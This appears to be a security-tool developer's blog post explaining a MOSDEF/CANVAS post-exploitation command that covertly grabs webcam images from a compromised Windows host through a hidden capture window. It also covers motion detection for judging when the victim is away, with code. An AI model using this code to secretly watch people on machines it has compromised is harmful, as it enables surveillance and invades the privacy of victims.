When you have spent a fair amount of time digging through the heap for an exploit without any significant result, you start to feel unproductive.
To avoid that feeling, from time to time I stop what I'm doing and pick up a lame pet project to clear my mind; in this case it was taking a picture with the webcam.
It's actually quite simple, unless you follow the CF_BITMAP path, in which case you will lose a day until you figure out that the solution is CF_DIB.
The key feature of MOSDEF is that it lets you avoid touching the disk or executing commands unless it's really needed, which gives you a tremendous post-exploitation advantage over host-based IDS. Each time I see people uploading a file and executing it, it sends a chill down my spine.
MOSDEF basically compiles C code into process-independent shellcode that resolves API functions remotely; as you might guess, everything gets executed inside the exploited process.
The first step in writing a MOSDEF C post-exploitation command is to find out which API functions you need, in this case to get a picture from a webcam. The first Google hit pointed to DirectShow, which is probably the smartest idea, but translating it into MOSDEF could be a little time-consuming (yes, tomorrow I'm back to more heap). So I went with capCreateCaptureWindow.
#import "remote", "avicap32.dll|capCreateCaptureWindowA" as "capCreateCaptureWindowA"
This function creates a video window (which you can obviously start hidden) and returns its handle. Using that handle, you can send different messages to either record video or take a picture.
In my case it was the second option, so I did the following:
// Create a Window and connect it to the driver
hwnd = capCreateCaptureWindowA("CANVAS", 0x40000000, 0, 0, 640, 480, proghwnd, 0);
SendMessageA(hwnd, 1024+10 ,0,0); // WM_CAP_DRIVER_CONNECT
SendMessageA(hwnd, 1024+50 ,1,0); // WM_CAP_SET_PREVIEW
SendMessageA(hwnd, 1024+52 ,30,0); // WM_CAP_SET_PREVIEWRATE
// Get a Frame and copy it to the clipboard
SendMessageA(hwnd, 1084,0,0); // WM_CAP_GRAB_FRAME
SendMessageA(hwnd, 1054,0,0); // WM_CAP_EDIT_COPY, copy to clipboard
You would think this is the hard part, but what took me more time was grabbing the picture out of the clipboard, since I tried to grab it as a CF_BITMAP and that didn't work out as expected.
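As a side note, the magic numbers in the SendMessageA calls above are all offsets from WM_USER (1024), as defined in the Video for Windows header. The Python sketch below just spells them out with their usual names; the `CAPTURE_SEQUENCE` list is a hypothetical helper for illustration, not part of MOSDEF or CANVAS.

```python
# Named versions of the constants used in the capture code.
# Values follow the Video for Windows definitions (WM_CAP_START == WM_USER).
WM_USER = 0x0400                      # 1024
WM_CAP_START = WM_USER

WM_CAP_DRIVER_CONNECT = WM_CAP_START + 10
WM_CAP_EDIT_COPY = WM_CAP_START + 30
WM_CAP_SET_PREVIEW = WM_CAP_START + 50
WM_CAP_SET_PREVIEWRATE = WM_CAP_START + 52
WM_CAP_GRAB_FRAME = WM_CAP_START + 60

WS_CHILD = 0x40000000                 # window style passed to capCreateCaptureWindowA
CF_DIB = 8                            # clipboard format used to read the frame back

# Hypothetical helper: the (message, wParam, lParam) triples in the order
# they are sent to the capture window in the post.
CAPTURE_SEQUENCE = [
    (WM_CAP_DRIVER_CONNECT, 0, 0),    # connect to capture driver 0
    (WM_CAP_SET_PREVIEW, 1, 0),       # enable preview
    (WM_CAP_SET_PREVIEWRATE, 30, 0),  # preview rate, as in the post
    (WM_CAP_GRAB_FRAME, 0, 0),        # grab a single frame
    (WM_CAP_EDIT_COPY, 0, 0),         # copy the frame to the clipboard
]
```

So 1084 is WM_CAP_GRAB_FRAME and 1054 is WM_CAP_EDIT_COPY, which is easier to keep straight than the raw numbers.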
The solution was to grab it as CF_DIB, which returns a memory object containing a BITMAPINFO structure followed by the actual raw image.
hbitmap = GetClipboardData( 8 ); // CF_DIB
pbih = GlobalLock( hbitmap );
pBits = pbih + 49;
hor = pbih->biWidth;
vert = pbih->biHeight;
bpp = pbih->biBitCount/8;
size = hor * vert * bpp ;
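Once the CF_DIB blob has been pulled back to the Python side, it can be split into header and pixels along the same lines. The sketch below is only an illustration under a few assumptions: `parse_dib` is a hypothetical name, the blob starts with a standard 40-byte BITMAPINFOHEADER, and the image is uncompressed (BI_RGB). Instead of a fixed offset it derives the start of the pixel data from biSize plus any palette, and it pads each row to 4 bytes, which is how DIB rows are stored.

```python
import struct

# BITMAPINFOHEADER: biSize, biWidth, biHeight, biPlanes, biBitCount,
# biCompression, biSizeImage, biXPelsPerMeter, biYPelsPerMeter,
# biClrUsed, biClrImportant (40 bytes, little-endian).
BITMAPINFOHEADER = struct.Struct("<IiiHHIIiiII")

def parse_dib(blob):
    """Return (width, height, bits_per_pixel, pixel_bytes) from a CF_DIB blob."""
    (bi_size, width, height, _planes, bit_count, compression,
     _size_image, _xppm, _yppm, clr_used, _clr_important) = \
        BITMAPINFOHEADER.unpack_from(blob, 0)
    if compression != 0:
        raise ValueError("only uncompressed (BI_RGB) DIBs are handled here")

    # A palette follows the header for <= 8 bpp images (or when biClrUsed is set).
    if bit_count <= 8:
        palette_entries = clr_used or (1 << bit_count)
    else:
        palette_entries = clr_used
    offset = bi_size + 4 * palette_entries

    # Each row is padded to a multiple of 4 bytes.
    stride = ((width * bit_count + 31) // 32) * 4
    size = stride * abs(height)
    return width, height, bit_count, blob[offset:offset + size]
```

For a 640x480 frame at 24 bits per pixel the rows need no padding (640 * 3 is a multiple of 4), so the size matches `hor * vert * bpp` from the MOSDEF code.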
The whole thing simply gets wrapped into a small Python command called "saycheese".
After it gets executed, you will get a scary face like this one in your screenshot section.
Neat. A picture is worth a thousand words, at least for your boss or your clients.
But if you are one of those owl hackers (*blink*) who wait deep into the night for your prey to stop using the machine so you can start downloading the 3 GB database, you can rest now.
I added a small script that runs our motiondetection command, which returns the percentage of motion based on two pictures taken through the webcam (the algorithm is quite simple: just compare pixel by pixel to find what changed).
Aside from the percentage, it returns a neat picture showing the place where motion was found. (NOTE: Any resemblance of any character to any actual person, whether living or dead, is purely coincidental, especially with that Keanu Reeves movie).
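For the curious, a pixel-by-pixel comparison of that kind can be sketched in a few lines of Python. This is not the actual motiondetection code, just a minimal illustration: `detect_motion`, the per-channel `threshold` and the 3-bytes-per-pixel default are assumptions made for the example. It returns both the percentage and a per-pixel mask that could be used to paint the "where did it move" picture.

```python
def detect_motion(frame_a, frame_b, bytes_per_pixel=3, threshold=16):
    """Compare two raw frames and return (percent_changed, changed_mask).

    A pixel counts as changed when any of its channels differs by more
    than `threshold` (an arbitrary value chosen to ignore sensor noise).
    """
    if len(frame_a) != len(frame_b):
        raise ValueError("frames must have the same size")
    if len(frame_a) % bytes_per_pixel:
        raise ValueError("frame size is not a whole number of pixels")

    mask = []
    for start in range(0, len(frame_a), bytes_per_pixel):
        pixel_a = frame_a[start:start + bytes_per_pixel]
        pixel_b = frame_b[start:start + bytes_per_pixel]
        mask.append(any(abs(a - b) > threshold
                        for a, b in zip(pixel_a, pixel_b)))

    if not mask:
        return 0.0, mask
    return 100.0 * sum(mask) / len(mask), mask
```

Feeding it the pixel bytes of two frames taken a moment apart gives the percentage directly; the mask has one boolean per pixel, in the same order as the frame data.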
EDIT: Juano@Netifera shared his knowledge on the subject. To improve the accuracy of the motion detection algorithm, you can take a couple of pictures and build an array from the average pixel at each position; that will give you a decent background image to compare with.
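A rough Python sketch of that averaging idea, assuming all frames are raw byte strings of the same size (`average_background` is a hypothetical name, and integer averaging is a simplification):

```python
def average_background(frames):
    """Build a background frame by averaging each byte position across frames."""
    if not frames:
        raise ValueError("need at least one frame")
    length = len(frames[0])
    if any(len(frame) != length for frame in frames):
        raise ValueError("all frames must have the same size")

    count = len(frames)
    # zip(*frames) yields, for each position, the values from every frame.
    return bytes(sum(column) // count for column in zip(*frames))
```

The result has the same layout as a single frame, so it can be compared against a fresh capture exactly like any other picture.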